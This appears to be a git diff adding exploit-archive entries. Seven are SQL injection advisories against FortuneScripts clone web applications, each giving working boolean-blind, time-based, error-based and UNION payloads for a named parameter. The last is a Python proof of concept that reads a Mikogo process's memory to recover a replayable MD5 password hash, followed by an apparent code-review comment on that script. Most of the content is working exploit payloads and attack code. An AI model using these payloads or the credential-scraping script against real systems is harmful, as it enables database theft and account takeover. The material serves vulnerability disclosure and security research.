+# Exploit Title: FS Food Delivery Script - SQL Injection
+# Date: 2017-10-23
+# Exploit Author: 8bitsec
+# Vendor Homepage: https://fortunescripts.com/
+# Software Link: https://fortunescripts.com/product/food-delivery/
+# Version: 23 October 17
+# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
+# Email: contact@8bitsec.io
+# Contact: https://twitter.com/_8bitsec
+
+Release Date:
+=============
+2017-10-23
+
+Product & Service Introduction:
+===============================
+This is a versatile script to help you launch a online food delivery portal like Foodpanda.
+
+Technical Details & Description:
+================================
+
+SQL injection on [keywords] parameter.
+
+Proof of Concept (PoC):
+=======================
+
+SQLi:
+
+https://localhost/[path]/food/
+
+Parameter: keywords (POST)
+ Type: error-based
+ Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+ Payload: keywords=xxxxx' AND (SELECT 2438 FROM(SELECT COUNT(*),CONCAT(0x717a786a71,(SELECT (ELT(2438=2438,1))),0x7162717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'TkKa'='TkKa&order_option=1&category=1&price=1000
+
+ Type: UNION query
+ Title: Generic UNION query (NULL) - 22 columns
+ Payload: keywords=xxxxx' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a786a71,0x497a704b724e4c4e665a556e6b626d45534a696d5a79554d726e506a686a6c5649627355675a6269,0x7162717871),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- hSOz&order_option=1&category=1&price=1000
+
+==================
+8bitsec - [https://twitter.com/_8bitsec]
\ No newline at end of file
diff --git a/platforms/php/webapps/43039.txt b/platforms/php/webapps/43039.txt
new file mode 100755
index 000000000..480b27b31
--- /dev/null
+++ b/platforms/php/webapps/43039.txt
@@ -0,0 +1,44 @@
+# Exploit Title: FS Expedia Clone - SQL Injection
+# Date: 2017-10-23
+# Exploit Author: 8bitsec
+# Vendor Homepage: https://fortunescripts.com/
+# Software Link: https://fortunescripts.com/product/expedia-clone/
+# Version: 23 October 17
+# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
+# Email: contact@8bitsec.io
+# Contact: https://twitter.com/_8bitsec
+
+Release Date:
+=============
+2017-10-23
+
+Product & Service Introduction:
+===============================
+Coded in PHP/MySQL, this is an ultra efficient script hot favorite with travel agencies worldwide.
+
+Technical Details & Description:
+================================
+
+SQL injection on [hid] parameter.
+
+Proof of Concept (PoC):
+=======================
+
+SQLi:
+
+https://localhost/[path]/hotel.php?hid=2 AND 6652=6652
+
+Parameter: hid (GET)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: hid=2 AND 6652=6652
+
+ Type: AND/OR time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind
+ Payload: hid=2 AND SLEEP(5)
+
+ Type: UNION query
+ Title: Generic UNION query (NULL) - 9 columns
+ Payload: hid=-1685 UNION ALL SELECT NULL,CONCAT(0x7162716271,0x696b6a4c52576c76446173666d5972704d454258706146434f544c78416a52754444694864786a42,0x7176786b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Nqcw
+==================
+8bitsec - [https://twitter.com/_8bitsec]
\ No newline at end of file
diff --git a/platforms/php/webapps/43040.txt b/platforms/php/webapps/43040.txt
new file mode 100755
index 000000000..3332b26eb
--- /dev/null
+++ b/platforms/php/webapps/43040.txt
@@ -0,0 +1,40 @@
+# Exploit Title: FS Freelancer Clone - SQL Injection
+# Date: 2017-10-23
+# Exploit Author: 8bitsec
+# Vendor Homepage: https://fortunescripts.com/
+# Software Link: https://fortunescripts.com/product/freelancer-clone/
+# Version: 23 October 17
+# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
+# Email: contact@8bitsec.io
+# Contact: https://twitter.com/_8bitsec
+
+Release Date:
+=============
+2017-10-23
+
+Product & Service Introduction:
+===============================
+Launching within minutes the best ever reverse auction website available online is no more a distant dream!
+
+Technical Details & Description:
+================================
+
+SQL injection on [sk] parameter.
+
+Proof of Concept (PoC):
+=======================
+
+SQLi:
+
+https://localhost/[path]/category.php?sk=2 AND 5895=5895
+
+Parameter: sk (GET)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: sk=2 AND 5895=5895
+
+ Type: UNION query
+ Title: Generic UNION query (NULL) - 4 columns
+ Payload: sk=-9224 UNION ALL SELECT NULL,NULL,CONCAT(0x717a627071,0x6a5954706679724662715071764b6f6b6b5448677770526873556c726b747079556b5341516d7559,0x716a627a71),NULL-- Pddp
+==================
+8bitsec - [https://twitter.com/_8bitsec]
\ No newline at end of file
diff --git a/platforms/php/webapps/43041.txt b/platforms/php/webapps/43041.txt
new file mode 100755
index 000000000..699c37c1c
--- /dev/null
+++ b/platforms/php/webapps/43041.txt
@@ -0,0 +1,40 @@
+# Exploit Title: FS Groupon Clone - SQL Injection
+# Date: 2017-10-23
+# Exploit Author: 8bitsec
+# Vendor Homepage: https://fortunescripts.com/
+# Software Link: https://fortunescripts.com/product/groupon-clone/
+# Version: 23 October 17
+# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
+# Email: contact@8bitsec.io
+# Contact: https://twitter.com/_8bitsec
+
+Release Date:
+=============
+2017-10-23
+
+Product & Service Introduction:
+===============================
+Developed in PHP/MySQL, the script is a perfect solution for a daily deal software with utmost versatility.
+
+Technical Details & Description:
+================================
+
+SQL injection on [category] parameter.
+
+Proof of Concept (PoC):
+=======================
+
+SQLi:
+
+https://localhost/[path]/search_product.php?category=1 AND 8132=8132&name=xxxxx
+
+Parameter: category (GET)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: category=1 AND 8132=8132&name=xxxxx
+
+ Type: AND/OR time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind
+ Payload: category=1 AND SLEEP(5)&name=xxxxx
+==================
+8bitsec - [https://twitter.com/_8bitsec]
\ No newline at end of file
diff --git a/platforms/php/webapps/43042.txt b/platforms/php/webapps/43042.txt
new file mode 100755
index 000000000..be2250d69
--- /dev/null
+++ b/platforms/php/webapps/43042.txt
@@ -0,0 +1,36 @@
+# Exploit Title: FS Indiamart Clone - SQL Injection
+# Date: 2017-10-23
+# Exploit Author: 8bitsec
+# Vendor Homepage: https://fortunescripts.com/
+# Software Link: https://fortunescripts.com/product/indiamart-clone/
+# Version: 23 October 17
+# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
+# Email: contact@8bitsec.io
+# Contact: https://twitter.com/_8bitsec
+
+Release Date:
+=============
+2017-10-23
+
+Product & Service Introduction:
+===============================
+The most favored web solution for webmasters aspiring to launch B2B Portals at minimum investment of time, money and effort.
+
+Technical Details & Description:
+================================
+
+SQL injection on [keywords] parameter.
+
+Proof of Concept (PoC):
+=======================
+
+SQLi:
+
+https://localhost/[path]/search.php?keywords=product') UNION ALL SELECT NULL,CONCAT(0x716b787071,0x506961776c6f79515068694b454e736668707675627448527949566e434472706a72624a466a5468,0x7171627171)-- LEhA&rctyp=Products
+
+Parameter: keywords (GET)
+ Type: UNION query
+ Title: Generic UNION query (NULL) - 2 columns
+ Payload: keywords=product') UNION ALL SELECT NULL,CONCAT(0x716b787071,0x506961776c6f79515068694b454e736668707675627448527949566e434472706a72624a466a5468,0x7171627171)-- LEhA&rctyp=Products
+==================
+8bitsec - [https://twitter.com/_8bitsec]
\ No newline at end of file
diff --git a/platforms/php/webapps/43043.txt b/platforms/php/webapps/43043.txt
new file mode 100755
index 000000000..c106058b6
--- /dev/null
+++ b/platforms/php/webapps/43043.txt
@@ -0,0 +1,39 @@
+# Exploit Title: FS Lynda Clone - SQL Injection
+# Date: 2017-10-23
+# Exploit Author: 8bitsec
+# Vendor Homepage: https://fortunescripts.com/
+# Software Link: https://fortunescripts.com/product/lynda-clone/
+# Version: 23 October 17
+# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
+# Email: contact@8bitsec.io
+# Contact: https://twitter.com/_8bitsec
+
+Release Date:
+=============
+2017-10-23
+
+Product & Service Introduction:
+===============================
+It was never this easy to launch a video tutorial website similar to Lynda.
+
+Technical Details & Description:
+================================
+
+SQL injection on [category] parameter.
+
+Proof of Concept (PoC):
+=======================
+
+SQLi:
+
+https://localhost/[path]/tutorial/
+
+Parameter: category (POST)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: category=5 AND 1845=1845&keywords=xxxxx
+
+==================
+8bitsec - [https://twitter.com/_8bitsec]
+
+
diff --git a/platforms/php/webapps/43044.txt b/platforms/php/webapps/43044.txt
new file mode 100755
index 000000000..7ab3d2a37
--- /dev/null
+++ b/platforms/php/webapps/43044.txt
@@ -0,0 +1,37 @@
+# Exploit Title: FS OLX Clone - SQL Injection
+# Date: 2017-10-23
+# Exploit Author: 8bitsec
+# Vendor Homepage: https://fortunescripts.com/
+# Software Link: https://fortunescripts.com/product/olx-clone/
+# Version: 23 October 17
+# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
+# Email: contact@8bitsec.io
+# Contact: https://twitter.com/_8bitsec
+
+Release Date:
+=============
+2017-10-23
+
+Product & Service Introduction:
+===============================
+The best performing Classifieds software ever known.
+
+Technical Details & Description:
+================================
+
+SQL injection on [catg_id] parameter.
+
+Proof of Concept (PoC):
+=======================
+
+SQLi:
+
+https://localhost/[path]/search-result.php?searchbox=search&catg_id=5' AND 4453=4453 AND 'QlZa'='QlZa
+
+Parameter: catg_id (GET)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: searchbox=search&catg_id=5' AND 4453=4453 AND 'QlZa'='QlZa
+
+==================
+8bitsec - [https://twitter.com/_8bitsec]
\ No newline at end of file
diff --git a/platforms/windows/local/43033.py b/platforms/windows/local/43033.py
new file mode 100755
index 000000000..3f8bde8aa
--- /dev/null
+++ b/platforms/windows/local/43033.py
@@ -0,0 +1,103 @@
+#!/usr/bin/env python
+#
+#
+# Mikogo 5.4.1.160608 Local Credentials Disclosure
+#
+#
+# Vendor: Snapview GmbH
+# Product web page: https://www.mikogo.com
+# Affected version: 5.4.1.160608
+#
+# Summary: Mikogo is a desktop sharing software application for
+# web conferencing and remote support, and is provided by the online
+# collaboration provider, BeamYourScreen GmbH. Mikogo provides
+# its software as native downloads for Windows, Mac OS X, Linux,
+# iOS and Android.
+#
+# Desc: Mikogo is vulnerable to local credentials disclosure, the
+# supplied password is stored as a MD5 hash format in memory process.
+# A potential attacker could reveal the supplied password hash and
+# re-use it or store it via the configuration file in order to gain
+# access to the account.
+#
+# ------------------------------------------------------------------
+#
+# 0:017> s -a 0 L?80000000 "password="
+# 0125cdad 70 61 73 73 77 6f 72 64-3d 00 00 26 6c 61 6e 67 password=..&lang
+# 0146e6b8 70 61 73 73 77 6f 72 64-3d 00 00 00 64 6f 6d 61 password=...doma
+# 06a422b3 70 61 73 73 77 6f 72 64-3d 34 42 33 42 38 37 34 password=482C811
+# 0:017> da 06a422b3
+# 06a422b3 "password=482C811DA5D5B4BC6D497FF"
+# 06a422d3 "A98491E38...."
+#
+# ...
+# ...
+#
+# C:\Users\Charlie\Desktop>python mikogo_mem.py
+# [~] Searching for pid by process name 'Mikogo-host.exe'..
+# [+] Found process with pid #1116
+# [~] Trying to read memory for pid #1116
+# [+] Credentials found!
+# ----------------------------------------
+# [+] MD5 Password: 482C811DA5D5B4BC6D497FFA98491E38
+#
+# ------------------------------------------------------------------
+#
+# Tested on: Microsoft Windows 7 Professional SP1 (EN)
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+# @zeroscience
+#
+#
+# Advisory ID: ZSL-2017-5439
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5439.php
+#
+#
+# 03.07.2017
+#
+#
+# Based on Yakir Wizman's PoC:
+#
+
+
+import time
+import urllib
+from winappdbg import Debug, Process
+
+username = ''
+password = ''
+found = 0
+filename = "Mikogo-host.exe"
+process_pid = 0
+memory_dump = []
+
+debug = Debug()
+try:
+ print "[~] Searching for pid by process name '%s'.." % (filename)
+ time.sleep(1)
+ debug.system.scan_processes()
+ for (process, process_name) in debug.system.find_processes_by_filename(filename):
+ process_pid = process.get_pid()
+ if process_pid is not 0:
+ print "[+] Found process with pid #%d" % (process_pid)
+ time.sleep(1)
+ print "[~] Trying to read memory for pid #%d" % (process_pid)
+
+ process = Process(process_pid)
+ for address in process.search_bytes('\x0a\x70\x61\x73\x73\x77\x6f\x72\x64\x3d'):
+ memory_dump.append(process.read(address,42))
+ for i in range(len(memory_dump)):
+ password = memory_dump[i].split('password=')[1]
+ if password !='':
+ found = 1
+ print "[+] Credentials found!\r\n----------------------------------------"
+ print "[+] MD5 Password: %s" % password
+ if found == 0:
+ print "[-] Credentials not found! Make sure the client is connected."
+ else:
+ print "[-] No process found with name '%s'." % (filename)
+
+ debug.loop()
+finally:
+ debug.stop()
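Review bot: `if process_pid is not 0:` tests object identity against an integer literal, which only behaves like a value comparison because CPython caches small ints; it should read `if process_pid != 0:`. `import urllib` and `username = ''` are never used in the visible code and can be dropped. The header line `# Based on Yakir Wizman's PoC:` is followed by an empty comment, so the attribution has no reference; the source link should be filled in or the line removed. Because the header states that the recovered MD5 value can be re-used to access the account, the printed hash is credential-equivalent, and a comment such as `# output is a replayable credential: keep it out of shared logs` above the final `print` would tell anyone running this in a test lab to handle it as a secret.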